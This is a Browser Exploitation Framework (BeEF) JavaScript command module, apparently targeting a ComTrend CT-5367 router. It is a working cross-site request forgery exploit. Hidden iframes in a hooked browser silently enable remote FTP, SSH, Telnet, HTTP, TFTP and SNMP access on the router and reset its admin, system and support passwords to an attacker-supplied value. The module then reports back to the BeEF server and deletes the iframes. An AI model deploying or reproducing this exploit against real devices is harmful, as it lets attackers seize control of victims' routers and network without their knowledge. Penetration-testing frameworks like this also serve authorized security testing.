1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
  var gateway = '<%= @base %>'; 
9
  var passwd  = '<%= @password %>';
10
  var timeout = 15;
11

12
  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
13
  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
14

15
  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
16
  ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
17

18
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
19

20
  cleanup = function() {
21
    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
22
    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
23
  }
24
  setTimeout("cleanup()", timeout*1000);
25

26
});
27

28

29